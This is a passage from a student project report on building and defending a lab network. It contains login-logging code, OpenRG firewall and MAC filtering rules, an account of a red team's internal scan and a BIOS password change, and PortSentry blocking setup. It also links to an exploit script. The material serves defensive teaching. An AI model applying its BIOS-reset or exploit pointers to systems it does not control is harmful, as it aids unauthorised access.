                    clientSocket[idx].socket = accepted;
                    clientSocket[idx].isActive = true;
                    WaitForData(idx);
                }
                socListener.BeginAccept(new AsyncCallback(OnClientConnect), null);
            }
            catch (ObjectDisposedException)
            {
                System.Diagnostics.Debugger.Log(0, "1", "\n OnClientConnection: Socket has been closed\n");
            }
            catch (SocketException se)
            {
                Console.Write("OnClientConnect: " + se.Message);
            }
        }

        // Index of the first free slot, or -1 when all maxConnections slots are taken
        private int getFirstInactive()
        {
            for (int i = 0; i < maxConnections; i++)
            {
                if (!clientSocket[i].isActive)
                {
                    return i;
                }
            }
            return -1;
        }

        private void sendData(int socketIdx, string strData)
        {
            byte[] byData = System.Text.Encoding.ASCII.GetBytes(strData);
            clientSocket[socketIdx].socket.Send(byData);
        }

        // Clear button: drop the selection if there is one, otherwise empty the display (the file is untouched)
        private void Clear_Click(object sender, EventArgs e)
        {
            if (LogList.SelectedItems.Count != 0)
                LogList.ClearSelected();
            else
                LogList.Items.Clear();
        }
    }
}
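The log file the server above writes is only useful for tracing an internal attack if its records can be turned back into login sessions. The following Python is an added example, not part of the project's C# code: it parses records in the layout the client sends, pairs logins with logouts and answers who was logged on at a given time. The sample log, the FEA domain and account names, and the US date format assumed for DateTime.Now.ToString() are all constructed assumptions.

```python
"""Added example (not the project's code): rebuild login sessions from the Log.txt
records written by the C# server above and ask who was logged on at a given time."""
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Record layout as the client sends it: "*UserName: DOMAIN\user Login Time:  <DateTime.Now>"
# on login and "UserName: DOMAIN\user Logout Time :  <DateTime.Now>" on logout.
RECORD_RE = re.compile(r"^\*?UserName:\s+(?P<user>\S+)\s+(?P<kind>Login|Logout) Time\s*:\s*(?P<when>.+?)\s*$")
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"    # DateTime.Now.ToString() is culture dependent; US format assumed

# Constructed sample log, not captured from the project. The blank lines are there because the
# server appends "\n" after every record; the odd line stands for anything else that reached the
# server's port, since it writes whatever it receives.
SAMPLE_LOG = """
*UserName: FEA\\alice Login Time:  5/22/2006 8:05:12 AM

*UserName: FEA\\bob Login Time:  5/22/2006 9:40:00 AM

UserName: FEA\\alice Logout Time :  5/22/2006 12:30:00 PM

not a login record

*UserName: FEA\\alice Login Time:  5/22/2006 1:15:00 PM

UserName: FEA\\bob Logout Time :  5/22/2006 5:55:00 PM
"""

Record = Tuple[str, str, datetime]                   # (user, "Login" | "Logout", timestamp)
Session = Tuple[str, datetime, Optional[datetime]]   # (user, login, logout or None if still open)


def parse_records(text: str) -> Tuple[List[Record], List[str]]:
    """Split the log into well-formed records and rejected lines (never silently dropped)."""
    records, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = RECORD_RE.match(line)
        try:
            records.append((m.group("user"), m.group("kind"), datetime.strptime(m.group("when"), TIME_FMT)))
        except (AttributeError, ValueError):         # no match, or a timestamp in another format
            rejected.append(line)
    return records, rejected


def build_sessions(records: List[Record]) -> List[Session]:
    """Pair each login with the next logout of the same user, in time order. A logout with no
    open login is ignored; a login never followed by a logout (the client only reports logout
    on Windows shutdown) stays open with logout=None."""
    open_logins: Dict[str, List[datetime]] = {}
    sessions: List[Session] = []
    for user, kind, when in sorted(records, key=lambda r: r[2]):
        if kind == "Login":
            open_logins.setdefault(user, []).append(when)
        elif open_logins.get(user):
            sessions.append((user, open_logins[user].pop(0), when))
    for user, logins in open_logins.items():
        sessions.extend((user, start, None) for start in logins)
    return sorted(sessions, key=lambda s: s[1])


def logged_on_at(sessions: List[Session], t: datetime) -> List[str]:
    """Users whose session covers t; an open session counts as still logged on."""
    return sorted(user for user, start, end in sessions if start <= t and (end is None or t < end))


def who_was_logged_on(log_text: str, when: str) -> List[str]:
    """Convenience entry point taking the timestamp in the same format as the log."""
    records, _ = parse_records(log_text)
    return logged_on_at(build_sessions(records), datetime.strptime(when, TIME_FMT))


if __name__ == "__main__":
    recs, bad = parse_records(SAMPLE_LOG)
    for user, start, end in build_sessions(recs):
        print(f"{user}: {start} -> {end or 'still logged on'}")
    print("logged on at 10:00:", who_was_logged_on(SAMPLE_LOG, "5/22/2006 10:00:00 AM"))
    print("rejected:", bad)
```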
5. Countering the Attacks
Now that the network was ready and secured, it was time to counter the attacks
performed by the hackers’ team. They started attacking externally, and they were then
given a user account to attack internally.
5.1 First Attack
The first attack was performed in the first week of May. None of our scanners and event
alarms pinpointed it, but we discovered what had been done by social engineering (some
colleagues were assisting the hackers’ team, and told us about the attack).
When the hackers could not log in from the outside (because of the firewall), they
plugged their computer into one of our switch’s ports, i.e. onto the internal network, and
performed an extensive scan.
Although such an attack was not meant to happen, as it did not follow some pre-set
guidelines, we still searched for a way to prevent it.
We decided that the best way to keep non-users out is to prevent foreign MAC/IP
addresses from accessing the network, whether from outside or from within. Our firewall does not
support third-party software platforms, but higher-caliber routers such as the 10/100 4-Port VPN Router (RV042)
can run platforms like OpenRG, which lets you configure
the firewall manually. After loading this software on the router you not only get
a secure and sophisticated firewall but also gain control over the IP and MAC addresses on your internal
LAN. Before going deep into the calibration of a firewall we will
give a general view of the firewall mechanism, the firewall rules and the firewall chains,
and then give an example of each of the last two.
Firewall Mechanism
The firewall configuration is a set of:
• Firewall rules (rule set)
• Firewall active devices
• Firewall configuration flags
The firewall rule set is a set of firewall rules, represented as firewall opcodes that the
kernel (data-path module) executes for each packet that traverses the firewall.
The rules come from:
• The user, through the different tabs in the security screen.
• The user, when configuring general definitions that have an effect on the firewall.
For example, changing the security level (High/Typical/Maximum), adding or
removing the firewall from a device, or changing the route level of a device
(NAT/NAPT/ROUTE).
• Tasks that need to open a port in the firewall, like the PPTP or IPsec
servers.
• The firewall itself, to block packets that pose security hazards.
The firewall rules can be roughly divided into three categories:
1. Rules that are configured in the Firewall Rules format and saved in this format.
This format is used by the "Advanced Filtering" feature in order to insert generic
firewall rules.
2. Rules that belong to the firewall features. These rules are controlled by the
various tabs in the security screen, and have their own format.
3. Implicit rules that are part of the network devices’ configuration. For example, the
security level (Minimum/Typical/High) or the Internet Connection Firewall
check box in a Connection Setting screen.
Firewall Rule
Firewall Rule is a generic API for controlling the firewall operation, providing you with
full control of matching and filtering. This is also the firewall’s external interface for tasks
that wish to configure firewall rules. Each firewall rule consists of a match section and an
action section. When a packet arrives at the firewall it is checked against the
match section. If it passes the criteria in the match section, the rule action is taken.
For example, take this advanced filtering rule:
(rule
    (0
        (enabled(1))
        (match
            (ip_src_start(212.1.1.8))
            (ip_src_end(212.1.1.233))
            (ip_dst_start(0.0.0.0))
            (ip_dst_end(255.255.255.255))
        )
        (action
            (type(accept))
            (log(1))
        )
    )
)
The match section will match packets that have a source IP in the range of 212.1.1.8-
212.1.1.233. If the packet is matched, the action to take is to accept the packet and to
generate a log message.
The important firewall actions are:
• Drop - drops the packet.
• Reject - drops the packet and sends an ICMP error or a TCP reset to the
originating peer.
• Accept - accepts the packet (stateful).
• Accept Packet - accepts the packet (stateless).
• Accept-NAT - for outbound packets: accepts the packet and NATs the source IP
address.
• Accept-Redirect - for inbound packets: accepts the packet and NATs the
destination address (this action is also known as DNAT or RNAT).
• Log - generates a log message.
• Call - calls a chain (see below).
Firewall Chain
A chain in the firewall is a list of rules, which are executed sequentially one after the
other. Chains let you create a more complex and optimized firewall rule set. For
example, the core chains of the firewall are the input chain, which is called for inbound
packets only, and the outbound chain, which is called for outbound packets only. The
flow of a packet through the firewall chains is controlled by rules that have Call as their
action. A good example of the use of chains is the firewall GUI, which gives you
an interface to fill in several chains:
• Initial inbound: First rules performed by the firewall for inbound packets.
• Initial outbound: First rules performed by the firewall for outbound packets.
• Inbound/outbound chains for each device - chains that consist of rules to perform
when a packet is received/transmitted on a certain device.
• Final inbound: Last rules performed by the firewall for inbound packets.
• Final outbound: Last rules performed by the firewall for outbound packets.
Looking at the firewall rules as a program executed by the data-path module, a chain
represents a call to a function when some condition is matched. For instance, if the packet is
incoming on device 'dev0', call 'Inbound device chain'. Chains can also return a value
when they finish executing.
Rules and Chains Examples
The advanced filter rg_conf API is a powerful tool for configuring firewall rules in the most
flexible way. Residing in rg_conf/fw/policy, it enables you to:
• Define several policies for the firewall.
• Group rules in a chain.
• Define initial and final rules.
• Define rules per device.
• Define rules that match Service, IP address, IP range, MAC address, and other
options such as fragments.
• Define the action for a rule: call another chain, accept and create a stateful inspection
connection, accept stateless, drop packet, reject.
• Define rules using a wildcard interface or a wildcard IP. For example: All LAN
devices/All WAN devices.
The advanced filter mechanism can be used as a platform for firewall chain call
precedence.
The rg_conf contains two main chains, used only to define the call order for chains:
• Inbound traffic (chain ID 1300)
• Outbound traffic (chain ID 1400)
Each one of the main chains is used only to define the call precedence for specific chains,
where specific rules are grouped.
The following is an example for rg_conf call chain:
(1300                                   // Chain 1300 - Inbound chain
    (description(Inbound rules))        // Chain description
    (type(5))
    (output(0))
    (rule
        (0                              // Rule 0 - Call Initial inbound chain
            (enabled(1))
            (action
                (type(call))
                (chain(900))
            )
        )
        (1                              // Rule 1 - Call device eth1 inbound rules
            (enabled(1))
            (action
                (type(call))
                (chain(1656))
            )
            (match
                (if(eth1))
            )
        )
    )
)
The chain calling order is predefined by system experts; changing it may destabilize the
system’s security, so modifying the chain structure is not advised.
Advanced Filtering Rule - 1
The following is an example of an advanced filter rule (without service) that blocks all
communication from LAN host 192.168.1.15 to any WAN host.
(rule                                   // Rule entry
    (0                                  // Rule ID #0
        (enabled(1))                    // Rule is active
        (match                          // Rule conditions
            (ip_src_start(192.168.1.15))    // Rule source IP address
            (ip_src_end(192.168.1.15))      // 192.168.1.15
            (ip_dst_start(0.0.0.0))         // Rule destination IP address
            (ip_dst_end(255.255.255.255))   // Any address: 0.0.0.0-255.255.255.255
            (services)                      // No services for this rule
        )
        (action                         // Rule result
            (type(drop))                // Drop packet
            (log(0))                    // Do not log
        )
    )
)
Advanced Filtering Rule - 2
The following is an advanced filter rule service example. This rule allows all HTTP
communication from any IP address to one of Yahoo!’s IP addresses:
(rule                                   // Rule entry
    (0                                  // Rule ID #0
        (enabled(1))                    // Rule is active
        (match                          // Rule conditions
            (ip_frag(0))                    // Allow fragmented packets
            (ip_src_start(0.0.0.0))         // Rule source IP address: any address
            (ip_src_end(255.255.255.255))   // 0.0.0.0 - 255.255.255.255
            (ip_dst_start(66.218.71.198))   // Rule destination IP address:
            (ip_dst_end(66.218.71.198))     // 66.218.71.198 (yahoo.com)
            (services                       // Rule services: if packet matches the
                (0                          // following services:
                    (service_id(16777219))  // Use service 16777219 (HTTP): if
                )                           // packet is TCP and destined to port 80
            )
        )
        (action                         // Rule result
            (type(accept))              // Accept packet and open connection
            (log(1))                    // Log this connection opening
        )
    )
)
Advanced MAC Filtering
The following is an example of an advanced MAC filtering rule. Using an
advanced filter enables you to define sophisticated MAC filter rules, which match not
only MAC addresses, but protocols and ports as well. For example, you want to prevent
HTTP access from one of your LAN hosts, but to allow it all other communications. Furthermore,
you would like to log each time it tries to connect to the HTTP server. The
following rule should be added in either the initial inbound chain or the specific device
chain.
(rule
    (0
        (enabled(1))
        (match
            (mac_src(aa:bb:cc:dd:ee:ff))    // LAN host MAC address
            (services
                (0
                    (service_id(16777219))  // HTTP service ID
                )
            )
        )
        (action                         // Rule result
            (type(drop))                // Drop the packet
            (log(1))                    // Log each attempt
        )
    )
)
Another MAC filtering rule would be to deny all but a set of predefined MAC addresses
access to all ports and protocols. In this way you prevent all foreign
MACs from using your network’s Internet connection or running sniffing or password-cracking
software on it. But even if a foreign PC is connected while all its services are denied,
it is still considered a security breach. The best security measure is to physically
secure the routers and switches of your LAN [whole section from 25].
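To make the rule and chain semantics described above concrete, here is an added Python example (not OpenRG/Jungo code) that parses rg_conf chains in the format shown and runs constructed packets through them. The chain ids 1300, 900 and 1656 and the HTTP service id 16777219 are from the page; the evaluation semantics (a terminal action ends processing, a call returns only if the called chain reached a verdict), chain 1500 as the final inbound chain, and all addresses and MACs are assumptions.

```python
"""Added example (not OpenRG/Jungo code): parse rg_conf chains and evaluate packets against them."""
import ipaddress
import re
from typing import Any, Dict, List, Optional, Tuple

SERVICES = {"16777219": ("tcp", 80)}                       # page: service 16777219 = HTTP (TCP/80)
TERMINAL = {"accept", "accept_packet", "drop", "reject"}   # assumed to end evaluation

def tokenize(text: str) -> List[str]:
    # Drop // comments, then split into '(' ')' and atoms (ids, IPs, MACs, words)
    return re.findall(r"\(|\)|[^\s()]+", re.sub(r"//[^\n]*", "", text))

def read(tokens: List[str], i: int) -> Tuple[list, int]:
    """Read one form starting at tokens[i]: (a (b c)) -> ['a', ['b', 'c']]."""
    if tokens[i] != "(":
        raise ValueError(f"expected '(' at token {i}: {tokens[i]!r}")
    node, i = [], i + 1
    while tokens[i] != ")":
        child, i = read(tokens, i) if tokens[i] == "(" else (tokens[i], i + 1)
        node.append(child)
    return node, i + 1

def load_chains(text: str) -> Dict[str, list]:
    """Index every top-level form by its chain id (the first atom)."""
    tokens, i, chains = tokenize(text), 0, {}
    while i < len(tokens):
        node, i = read(tokens, i)
        chains[node[0]] = node
    return chains

def field(node: list, name: str) -> Optional[list]:
    # Child form headed by `name`, e.g. field(rule, "action")
    return next((c for c in node[1:] if isinstance(c, list) and c and c[0] == name), None)

def scalar(node: list, name: str) -> Optional[str]:
    # Value of a (name(value)) leaf, e.g. scalar(action, "type") -> "drop"
    f = field(node, name)
    return f[1][0] if f and len(f) > 1 and isinstance(f[1], list) and f[1] else None

def matches(match: Optional[list], pkt: Dict[str, Any]) -> bool:
    """Apply a match section to a packet dict; ip_frag is not modelled here."""
    if match is None:                                      # no match section: every packet matches
        return True
    for side in ("src", "dst"):
        lo, hi = scalar(match, f"ip_{side}_start"), scalar(match, f"ip_{side}_end")
        if lo and not ipaddress.ip_address(lo) <= ipaddress.ip_address(pkt[side]) <= ipaddress.ip_address(hi):
            return False
    mac, dev = scalar(match, "mac_src"), scalar(match, "if")
    if (mac and mac.lower() != pkt["mac"].lower()) or (dev and dev != pkt["dev"]):
        return False
    services = field(match, "services")
    if services and len(services) > 1:                     # a bare (services) means any service
        wanted = {SERVICES.get(scalar(s, "service_id")) for s in services[1:]}
        return (pkt["proto"], pkt["dport"]) in wanted
    return True

def run_chain(chains: Dict[str, list], chain_id: str, pkt: Dict[str, Any],
              log: List[str], depth: int = 0) -> Optional[str]:
    """Walk the chain's rules in order. A terminal action is the verdict; a call descends
    and returns only if the called chain itself reached a verdict (assumed semantics)."""
    if depth > 16:
        raise RecursionError("chain call loop")
    for rule in (field(chains[chain_id], "rule") or [])[1:]:
        if scalar(rule, "enabled") != "1" or not matches(field(rule, "match"), pkt):
            continue
        action = field(rule, "action")
        kind = scalar(action, "type")
        if scalar(action, "log") == "1":
            log.append(f"chain {chain_id} rule {rule[0]} {kind}: {pkt['mac']} {pkt['src']}:{pkt['dport']}")
        if kind == "call":
            verdict = run_chain(chains, scalar(action, "chain"), pkt, log, depth + 1)
            if verdict is not None:
                return verdict
        elif kind in TERMINAL:
            return kind
    return None

def filter_packet(chains: Dict[str, list], pkt: Dict[str, Any]) -> Tuple[Optional[str], List[str]]:
    """Run one packet through the inbound chain 1300: (verdict or None, log lines)."""
    log: List[str] = []
    return run_chain(chains, "1300", pkt, log), log

def pkt(src: str, mac: str, dport: int, dev: str = "eth1") -> Dict[str, Any]:
    return {"src": src, "dst": "66.218.71.198", "mac": mac, "dev": dev, "proto": "tcp", "dport": dport}

# Constructed config: 1300 orders the calls (as on the page), 900 holds Advanced Filtering Rule 1,
# 1656 the Advanced MAC Filtering rule, 1500 (assumed final inbound) the deny-all-but-known-MACs policy
RG_CONF = """
(1300 (rule                                // Inbound chain
  (0 (enabled(1)) (action (type(call)) (chain(900))))                       // initial inbound
  (1 (enabled(1)) (action (type(call)) (chain(1656))) (match (if(eth1))))   // eth1 device chain
  (2 (enabled(1)) (action (type(call)) (chain(1500))))))                    // final inbound
(900 (rule (0 (enabled(1))                 // block LAN host 192.168.1.15 to any WAN host
  (match (ip_src_start(192.168.1.15)) (ip_src_end(192.168.1.15))
         (ip_dst_start(0.0.0.0)) (ip_dst_end(255.255.255.255)) (services))
  (action (type(drop)) (log(0))))))
(1656 (rule (0 (enabled(1))                // no HTTP from this LAN host, and log each attempt
  (match (mac_src(aa:bb:cc:dd:ee:ff)) (services (0 (service_id(16777219)))))
  (action (type(drop)) (log(1))))))
(1500 (rule                                // known MACs pass; anything else is dropped and logged
  (0 (enabled(1)) (match (mac_src(00:11:22:33:44:55)) (services)) (action (type(accept)) (log(0))))
  (1 (enabled(1)) (match (mac_src(aa:bb:cc:dd:ee:ff)) (services)) (action (type(accept)) (log(0))))
  (2 (enabled(1)) (action (type(drop)) (log(1))))))
"""
```

Calling `filter_packet(load_chains(RG_CONF), pkt("192.168.1.20", "aa:bb:cc:dd:ee:ff", 80))` returns the drop verdict from chain 1656 together with its log line, while the same host on port 443 falls through to chain 1500 and is accepted.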
5.2 Second Attack: Physical Attack
On Monday the 22nd of May, one day before the FYP report submission, and after an
absence of 2 days (weekend) from the Labs, we discovered upon switching on the
computers that the BIOS password had been changed. A display message asked us for the
“current password” before we could even enter the setup or load Windows (the display
message appeared just as the computer was switched on).
Although we had researched and knew about such a threat (accessing BIOS settings,
including the password, and modifying them), a misunderstanding in the course of the
semester led our team to omit setting a password that could not be cracked. Hence, the
hackers were successful in spotting a dangerous security breach, and denied us the use of
our computers (and hence our services).
The only way to fix this problem was to “physically” reset the BIOS password. This can
be done by opening the computer case, unplugging a 3-legged jumper (jumper 13) on the
motherboard and re-plugging it after switching the computer on. For more information on
how to prevent physical attacks, refer to section 2.1 (examples of counter-measures: lock the
case, set up cameras…).
After we physically reset the passwords ourselves, everything went back to normal (with
no memory loss incurred) and we could log in again to the Windows workstations and
servers. After checking the log files, and comparing the “vital company files” we created
with the backups, we were assured that no further internal attack had been made.
Note that our team stopped monitoring the network on Monday, May 22, 2006 at
6:00pm, i.e. 18 hours before the report submission deadline in order to focus on
writing the report. Nonetheless, some colleagues of ours, working on their own
FYPs in the computer labs, informed us that the hackers’ team showed up at
around 7:30pm on Monday, May 22, 2006, along with a person external to FEA, to
conduct some hacks on the network. Not only did they use outside help, but violated
a ‘cease-fire’ accord we had put into place to concentrate on writing the report.
Conclusion
Network security is essential to any business or even home that has a network connected
to the outside world (by means of the Internet for example). Our FYP was conducted in
this sense. This report aims at being a proper documentation usable in any situation
where a network has to be built and secured.
In the first part of the report, we have briefly presented an overview of networks to fully
understand the way in which they operate. Then, we have explored the theory of network
security. We have seen that it can be dissected according to the network layers, and the
corresponding security of each was discussed in depth. However, this does not cover all
aspects of network security. An attack through a given layer (for instance IP session
hijacking on the network layer) can lead to a breach on another layer (for example
sending malicious code on application layer). Therefore, it is important to keep in mind
that network security should be seen as a whole, even though it is divided into different
layers. Then, we presented a survey of the most common threats and the ways they
should be dealt with, since to properly secure a network it is important to know the enemy.
Topics such as attacks automated by malicious code, denial of service (DoS) and social
engineering were covered.
After this ‘theory’ part of the report, we documented the whole process that led to the
installation and defense of the network. Our network topology was presented (hierarchical
star topology to simulate a real business environment), as well as the means by which we
secured the perimeter (using a Linksys firewall). Then, we described the way in which
we installed the network (from installing the Operating Systems to creating a domain),
and went on to document the steps we took to secure it. We started by downloading all
relevant patches and service packs, then went on to disable the USB ports to protect the
network against flash drives, and ran some freeware tools such as LanGuard and Event
Alarm to tighten and monitor the security.
Once our secured network was up-and-running, we started to work on ways to optimize
security and monitoring. First, we customized a Honeyd program to our network’s
topology and needs (using Fedora) to confuse the hackers (when conducting external
attacks). Then, we wrote a Windows program that monitored the user logs: the output of
the program was a log file with the username of each user that has logged in, as well as
the time of logging in and out. In this way, internal attacks were spotted more easily and
dealt with in a faster and hence more efficient way.
Finally, the report also gives a full documentation of the attacks that were performed by
the hackers’ team. Although this was meant to be an exciting part of our FYP, the
hackers’ team was late in starting those attacks and hence not a lot of security breaches
were reported.
The FYP was a chance for us to be exposed to Windows and UNIX network security, and
gave us much needed exposure to these Operating Systems. Not only did we learn about
the theory behind network security, we also applied it and ‘lived’ it throughout the
second half of the year. We also contributed to the field by introducing honeypots (Honeyd) as
important and useful tools (they are not commonly used in businesses), as well as
creating a program that can enable a network administrator to monitor and archive the
logs. Many other contributions can be introduced in future work, as the network security
field is a really wide one!
References
1. Majari, S.A. “Security Engineering: Survey Analysis and Practical Guidelines for a multi-dimensional layered security”, 2004.
2. Cisco Systems, “Interconnecting Cisco Network Devices – Student Guide”.
3. Ford, D. “8 Simple Rules For Securing Your Internal Network”, 2003.
4. Lai, Hock, Tai, “Windows 2000 vulnerabilities and Solutions”, 2003.
5. http://www.atstake.com/research/advisories/2001/Outlook-NT4SP6a-BufferOverflow.vcf
6. www.securityfocus.com/data/vulnerabilities/exploits/wins2.pl
7. http://www.atruereview.com/articles/winsecurity.php
8. http://en.wikipedia.org/wiki/Network_topology
9. “Cisco Integrated Firewall Solutions” (data sheet): http://www.cisco.com/application/pdf/en/us/guest/netsol/ns118/c654/cdccont_0900aecd800eed2e.pdf
10. “Perimeter Security: A Security Blueprint for Enterprise Network”, Cisco White Paper, no date available.
11. “The Evolution of Network Security: From DMZ Designs to Devices”, Metagroup White Paper, May 2004.
12. Curtin, M. “Introduction to Network Security”, March 1997.
13. Blaze, M., Ioannidis, J., Keromytis, A.D. “Trust Management and Network Layer Security”, AT&T Laboratories – Research.
14. http://library.thinkquest.org/04oct/00460/netwAttack.html
15. http://www.comptechdoc.org/independent/security/recommendations/secattacks.html
16. http://www.insecure.org/sploits/l0phtcrack.lanman.problems.html
17. http://www.securitydocs.com/library/2695
18. http://labmice.techtarget.com/articles/usbflashdrives.htm
19. http://www.jsifaq.com, trick number 7093
20. A Virtual Honeypot Framework: http://niels.xtdnet.nl/papers/honeyd.pdf
21. Specter: http://www.specter.com
22. Honeyd: http://www.citi.umich.edu/u/provos/honeyd/
23. Decoy Server: http://www.recourse.com
24. Honeynets: http://project.honeynet.org/papers/honeynet/
25. www.jungo.com
Appendix
Appendix A
Source: http://support.microsoft.com/default.aspx?scid=187623
1. Run Regedt32 and go to this key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
NOTE: The above registry key is one path; it has been wrapped for readability.
2. Find the "PortNumber" subkey and notice the value of 00000D3D, hex for (3389). Modify the port number in Hex and save the new value.
To change the port for a specific connection on the Terminal Server:
1. Run Regedt32 and go to this key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\connection
NOTE: The above registry key is one path; it has been wrapped for readability.
2. Find the "PortNumber" subkey and notice the value of 00000D3D, hex for (3389). Modify the port number in Hex and save the new value.
NOTE: Because the use of alternate ports has not been fully implemented for Terminal Server 4.0, support will be provided as "reasonable effort" only, and Microsoft may require you to set the port back to 3389, if any problems occur.
Appendix B: PortSentry
1. Download and unzip source code:
   o Download: PortSentry source code (from http://sourceforge.net/projects/sentrytools)
     (Note: Portsentry version 1.1 includes a bug fix required for Red Hat 7.1 kernel 2.4)
   o Move to your source directory and unzip: tar -xzf portsentry-1.1.tar.gz
2. Edit include file and compile: cd portsentry-1.1/
   Read file README.install. It details the following:
   o Edit file: portsentry_config.h
     Set options:
     CONFIG_FILE - PortSentry run-time configuration file.
     WRAPPER_HOSTS_DENY - The path and name of TCP wrapper hosts.deny file.
     #define CONFIG_FILE "/opt/portsentry/portsentry.conf"
     #define WRAPPER_HOSTS_DENY "/etc/hosts.deny"
     #define SYSLOG_FACILITY LOG_DAEMON
     #define SYSLOG_LEVEL LOG_NOTICE
(Note: we use /opt/portsentry/ because we can locate custom files/software there. It allows for an easy backup by separating it from the OS. If you prefer, you can use /etc/portsentry/ for configurations files and follow the Linux/Unix file system logic)
The above default, "LOG_DAEMON", will log messages to the /var/log/messages file.
To log to a separate file dedicated to PortSentry logging: (This will eliminate logging clutter in the main system logging file)
Add logging directives to syslogd configuration file: /etc/syslog.conf
Change the following line to reflect that portsentry messages are not going to be logged to the regular syslog output file /var/log/messages
*.info;mail.none;news.none;authpriv.none;local6.none /var/log/messages
Add the following line to assign a portsentry log facility:
local6.* /var/log/portsentry.log
Note: Use tab not spaces in the syslog configuration file.
Restart syslogd: /etc/rc.d/init.d/syslog restart
Set portsentry_config.h entry to new log facility:
#define SYSLOG_FACILITY LOG_LOCAL6
Options for the SYSLOG_FACILITY are defined in /usr/include/sys/syslog.h They include:
SYSLOG_FACILITY   Facility Name   Description
LOG_LOCAL0        local0          reserved for local use
LOG_LOCAL1        local1          reserved for local use
LOG_LOCAL2        local2          reserved for local use
LOG_LOCAL3        local3          reserved for local use
LOG_LOCAL4        local4          reserved for local use
LOG_LOCAL5        local5          reserved for local use
LOG_LOCAL6        local6          reserved for local use
LOG_LOCAL7        local7          reserved for local use
LOG_USER          user            random user-level messages
LOG_MAIL          mail            mail system
LOG_DAEMON        daemon          system daemons
LOG_SYSLOG        syslog          messages generated internally by syslogd
LOG_LPR           lpr             line printer subsystem
LOG_NEWS          news            network news subsystem
LOG_UUCP          uucp            UUCP subsystem
LOG_CRON          cron            clock daemon
LOG_AUTHPRIV      authpriv        security/authorization messages (private)
LOG_FTP           ftp             ftp daemon
Options for the SYSLOG_LEVEL include:
SYSLOG_LEVEL   Priority   Description
LOG_EMERG      0          system is unusable
LOG_ALERT      1          action must be taken immediately
LOG_CRIT       2          critical conditions
LOG_ERR        3          error conditions
LOG_WARNING    4          warning conditions
LOG_NOTICE     5          normal but significant condition
LOG_INFO       6          informational
LOG_DEBUG      7          debug-level messages
   o Edit file: portsentry.conf to set paths for configuration files and ports to monitor.
     IGNORE_FILE="/opt/portsentry/portsentry.ignore"
     HISTORY_FILE="/opt/portsentry/portsentry.history"
     BLOCKED_FILE="/opt/portsentry/portsentry.blocked"
     KILL_ROUTE="/sbin/route add -host $TARGET$ reject" - Generic Unix KILL_ROUTE; the iptables/ipchains options below are better
Uncomment and modify if necessary the appropriate statements. The TCP_PORTS=, UDP_PORTS= lists are ignored for stealth scan detection modes. We added UDP port 68 (BOOTP) and TCP 21 (ftp), 22 (ssh), 25 (smtp mail), 53 (dns bind), 80 (http web server), 119 (news) to the ADVANCED_EXCLUDE_UDP and ADVANCED_EXCLUDE_TCP statements respectively.
ADVANCED_EXCLUDE_TCP="21,22,25,53,80,110,113,119" - server
ADVANCED_EXCLUDE_UDP="21,22,53,110,520,138,137,68,67"
OR
ADVANCED_EXCLUDE_TCP="113,139" - workstation
ADVANCED_EXCLUDE_UDP="520,138,137,68,67"
List of ports used by Remote Access trojans
PAM options:
KILL_HOSTS_DENY="ALL: $TARGET$"
For more on PAM see YoLinux network Admin Tutorial
Route deny options: (Options: network "route" or firewall command "iptables/ipchains")
Simple method to drop network return routes if ipchains are not compiled into your kernel:
KILL_ROUTE="/sbin/route add -host $TARGET$ reject"
You can check the addresses dropped with the command: netstat -rn
They will be routed to interface "-".
For Linux 2.2.x kernels (version 2.102+) using ipchains: (Best option)
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
OR
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY"
Note: The second option is without the "-l" or logging option so ipchains won't keep logging the portscan in /var/log/messages
For those using iptables (RH 7.1+ Linux Kernel 2.4+):
KILL_ROUTE="/sbin/iptables -I INPUT -s $TARGET$ -j DROP"
(Note: The default used in portsentry.conf uses the incorrect path for Red Hat. Change /usr/local/bin/iptables to /sbin/iptables)
Note on Red Hat 7.1: During installation/upgrade the firewall configuration tool /usr/bin/gnome-lokkit may be invoked. It will configure a firewall using ipchains and will add this to your boot process. To see if ipchains and the Lokkit configuration is invoked during system boot, use the command: chkconfig --list | grep ipchains. You can NOT use portsentry to issue iptables rules if ipchain rules have been issued previously. More info on iptables and ipchains support/configuration in Red Hat 7.1 and kernel 2.4.
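The configuration statements above (the file paths, the ADVANCED_EXCLUDE lists, and the KILL_ROUTE / KILL_HOSTS_DENY templates) are plain KEY="value" lines in which PortSentry substitutes the offending address for $TARGET$ and then hands the result to a shell. The following Python script is an added example, not PortSentry's code and not part of the original report: it parses a constructed portsentry.conf fragment, answers whether a port is excluded from stealth-scan detection, and expands the KILL_ROUTE template only after checking that the target is a literal IP address (the ipaddress check is the example's own safeguard, not a PortSentry feature). Function names and the sample configuration are assumptions of the example.

```python
"""Parse a PortSentry-style configuration and expand its KILL_ROUTE template.

Added example, not part of the PortSentry project. SAMPLE_CONF is a
constructed fragment that mirrors the keys discussed in the text.
"""
import ipaddress
import re
import shlex

# Constructed sample of a portsentry.conf fragment (workstation exclude lists,
# iptables KILL_ROUTE for a kernel 2.4+ host). Not a real file.
SAMPLE_CONF = '''
# paths
IGNORE_FILE="/opt/portsentry/portsentry.ignore"
HISTORY_FILE="/opt/portsentry/portsentry.history"
BLOCKED_FILE="/opt/portsentry/portsentry.blocked"
# ports ignored by the stealth (-atcp / -audp) detection modes
ADVANCED_EXCLUDE_TCP="113,139"
ADVANCED_EXCLUDE_UDP="520,138,137,68,67"
# block the scanner with netfilter; use one firewall family only
KILL_ROUTE="/sbin/iptables -I INPUT -s $TARGET$ -j DROP"
KILL_HOSTS_DENY="ALL: $TARGET$"
'''

# KEY="value" with optional surrounding whitespace; anything else is ignored.
_LINE = re.compile(r'^\s*([A-Z_]+)\s*=\s*"([^"]*)"\s*$')


def parse_conf(text):
    """Return {KEY: value} for KEY="value" lines; comments and blanks skipped."""
    conf = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        m = _LINE.match(line)
        if m:
            conf[m.group(1)] = m.group(2)
    return conf


def port_set(value):
    """'21,22,25' -> {21, 22, 25}; rejects values outside 0..65535."""
    ports = set()
    for tok in value.split(','):
        tok = tok.strip()
        if not tok:
            continue
        p = int(tok)
        if not 0 <= p <= 65535:
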